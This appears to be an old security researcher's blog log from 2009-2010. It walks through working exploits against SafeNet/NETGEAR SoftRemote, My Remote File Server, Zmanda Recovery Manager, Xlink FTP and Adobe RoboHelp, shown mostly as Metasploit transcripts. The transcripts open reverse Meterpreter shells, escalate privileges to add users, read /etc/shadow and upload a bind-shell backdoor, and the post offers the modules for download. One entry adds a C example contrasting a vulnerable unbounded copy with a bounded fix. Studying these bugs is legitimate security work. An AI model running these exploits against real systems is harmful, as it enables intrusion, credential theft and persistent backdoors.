02/03/10 - back from the dead (vulns.)
ORACLE create database link Buffer Overflow.
wasn't even aware of the bug until a vulnerability scanner pointed it out. old bug, new twist. demo for SAHA.
11/04/09 - SafeNet SoftRemote Local Stack Overflow.
SafeNet SoftRemote .spd (policy) files.
cool bug. since the app. is oem'd and used by both juniper
and netgear you can understand the impact. passing
an overly long string to the "GROUPNAME" argument gets you
here:
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012b628 0040b5e3 kernel32!lstrcpyA+0x18
00000000 00000000 spdedit+0xb5e3
0:000> !exchain
0012b618: kernel32!ValidateLocale+2b0 (7c839ac0)
0012b6cc: 41386341
Invalid exception stack at 37634136
0:000> !pattern_offset 20024 0x41386341
[Byakugan] Control of 0x41386341 at offset 84.
0:000> !pattern_offset 20024 0x37634136
[Byakugan] Control of 0x37634136 at offset 80.
pretty straightforward. a quick patch for the vuln. and
we get here:
msf exploit(handler) > rexploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (172.10.1.100:1975 -> 172.10.1.104:1049)
meterpreter > run whereami
[*] All up in the process space of 'SPDEdit.Exe'!
meterpreter > pwd
C:\Program Files\NETGEAR\NETGEAR ProSafe VPN Client
meterpreter >
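the bug pattern above, as an added example (constructed for illustration, not SoftRemote's code): a parser for a GROUPNAME= policy line with the unbounded lstrcpy-style copy beside a bounded one that refuses oversized values. the 64-byte buffer and the exact line syntax are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define GROUPNAME_MAX 64  /* assumed fixed buffer size; the real one is not on the page */

/* Vulnerable pattern, constructed for illustration (not SoftRemote's code):
 * the value after "GROUPNAME=" lands in a fixed stack buffer via an unbounded
 * copy, the same lstrcpyA-style copy the crash dump points at. Short input only. */
int parse_groupname_unsafe(const char *line, char out[GROUPNAME_MAX]) {
    const char *prefix = "GROUPNAME=";
    if (strncmp(line, prefix, strlen(prefix)) != 0)
        return -1;                        /* not a GROUPNAME line */
    strcpy(out, line + strlen(prefix));   /* no length check: overflow on long values */
    return 0;
}

/* Hardened version: measure the value first and reject anything that does not fit
 * with its terminator. Rejecting the policy file beats silently truncating it. */
int parse_groupname_safe(const char *line, char out[GROUPNAME_MAX]) {
    const char *prefix = "GROUPNAME=";
    size_t plen = strlen(prefix);
    if (strncmp(line, prefix, plen) != 0)
        return -1;
    const char *value = line + plen;
    size_t vlen = strcspn(value, "\r\n");  /* value ends at the end of the line */
    if (vlen >= GROUPNAME_MAX)
        return -2;                        /* too long: refuse before copying */
    memcpy(out, value, vlen);
    out[vlen] = '\0';
    return 0;
}

/* Constructed sample: a GROUPNAME line with a 120-byte value, the kind of oversized
 * input the post's pattern string produced. Returns the safe parser's verdict (-2). */
int check_overlong_groupname(void) {
    char line[160];
    char out[GROUPNAME_MAX];
    memset(line, 'A', sizeof line);
    memcpy(line, "GROUPNAME=", 10);
    line[10 + 120] = '\0';
    return parse_groupname_safe(line, out);
}

int main(void) {
    char out[GROUPNAME_MAX];
    int rc = parse_groupname_safe("GROUPNAME=vpnusers\r\n", out);
    printf("short value: rc=%d out=%s\n", rc, out);
    printf("overlong value: rc=%d\n", check_overlong_groupname());
    return 0;
}
```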
11/01/09 - Priv. Escalation.
meterpreter fun exploiting folder permissions.
a couple of posts by Francis Provencher looked like fun to incorporate
as meterpreter scripts. let's get our meterpreter session as an unprivileged
user going...
meterpreter > getuid
Server username: XPSPPRO\mc
meterpreter > shell
Process 472 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>net user test test /add
net user test test /add
System error 5 has occurred.
Access is denied.
C:\>exit
meterpreter >
as expected, we shouldn't be able to do that! so let's obtain the privs to do so.
meterpreter > run myremotefileserver_mserver -h
[*] My Remote File Server Build 2.4.1 privilege escalation.
OPTIONS:
-h This help menu
-p
-r
[-] Error in script: unexpected return
meterpreter > run myremotefileserver_mserver -p 8787
[*] Moving to the appropiate directory...
[*] Creating a copy of mserver.exe (mserver_back.exe)...
[*] Sending EXE payload 'C:\Program Files\My Remote Files\mserver.exe'.
[*] Done, now just wait for the callback...
meterpreter > exit
[*] Meterpreter session 1 closed.
msf exploit(handler) > [*] Command shell session 2 opened (172.10.1.100:8787 -> 172.10.1.104:1025)
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user test test /add
net user test test /add
The command completed successfully.
fun! one issue with these types of bugs is that unprivileged users
don't have the ability to start/stop/restart the service, so a reboot
will need to occur.
10/23/09 - Exploit Packs
Coming Soon.
most likely in the form of metasploit modules ;)
10/23/09 - CVE-2009-3102
Zmanda Recovery Manager for MySQL socket-server.pl command execution.
now, i'm all for running an automated tool to help discover vulns,
but when you have nothing to back up the results, then what?
for example:
$ sudo nasl -t 172.10.1.103 zrm_mysql_binpath_cmd_exec.nasl
zrm_mysql_binpath_cmd_exec.nasl: Success
as expected. now to take advantage of it.
msf auxiliary(zmanda_dohotcopy) > set CMD grep root /etc/shadow
CMD => grep root /etc/shadow
msf auxiliary(zmanda_dohotcopy) > run
[*] Sending command 'grep root /etc/shadow'...
[*] Received...
root:**edited**.:14318:0:99999:7:::
[*] Auxiliary module execution completed
msf auxiliary(zmanda_dohotcopy) >
trivial example, but writing an exploit to help validate
the issues is probably important.
10/05/09 - meterpreter scripting
meterpreter script for windows/shell_bind_tcp
meterpreter scripting helps _a lot_. and the ability to build payloads
dynamically from your script is just cool. for example:
msf exploit(xlink_client) >
[*] Started bind handler
[*] Server started.
[*] Sending Xlink FTP Client Buffer Overflow...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (172.10.0.206:56137 -> 172.10.0.221:9233)
msf exploit(xlink_client) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > pwd
C:\Program Files\OmniNFSe
at our meterpreter prompt, just invoke the script like so:
meterpreter > run msf_bind
[*] Uploads a windows/bind_shell_tcp backdoor and executes it.
Usage: run msf_bind -p
OPTIONS:
-p
meterpreter > run msf_bind -p 1975
[*] Sending EXE payload 'VDBASAJY.exe'
[*] Done uploading 'VDBASAJY.exe', executing a windows/shell_bind_tcp port on '1975'...
meterpreter >
Background session 2? [y/N]
once we get back to the console, use the connect command
to access your alternate shell.
msf exploit(xlink_client) > connect 172.10.0.221 1975
[*] Connected to 172.10.0.221:1975
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\OmniNFSe>
the script is here. this will soon be incorporated into meterpreter exploit scripts that take advantage of dacl vulnerabilities.
10/03/09 - CVE-2009-3068
Adobe RoboHelp Server Arbitrary File Upload and Execute Vulnerability.
my initial coverage for this vulnerability was written as an auxiliary module. for anyone not knowing the difference between aux and exploit modules, auxiliary modules do everything an exploit module does except make use of a 'payload'.
the aux module combined information from the intevydis blog entry and a hacked-up version of cmd.jsp.
in order to use the module, you will need to stick it into the appropriate namespace of your msf trunk.
msf > use auxiliary/admin/http/adobe_robohelper_authbypass
msf auxiliary(adobe_robohelper_authbypass) >
once you have it loaded, just point and shoot. keep in mind, for some of the commands passed to the CMD variable, you will need to call them like so: CMD="cmd /c ...."
msf auxiliary(adobe_robohelper_authbypass) > set RHOST 172.10.1.109
RHOST => 172.10.1.109
msf auxiliary(adobe_robohelper_authbypass) > set CMD "cmd /c net localgroup administrators"
CMD => cmd /c net localgroup administrators
msf auxiliary(adobe_robohelper_authbypass) > run
[*] Sending our POST request...
[*] Got sessionid of '4517981', sending our second request to 'CCGCFOUP.jsp' with command 'cmd /c net localgroup administrators'...
[*] Got:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
mc
The command completed successfully.
[*] Auxiliary module execution completed
you can get this module here. but a much cooler exploit module which uses a jsp reverse-shell can be found in the current svn.
10/01/09 - New look!
Just getting things up and running again.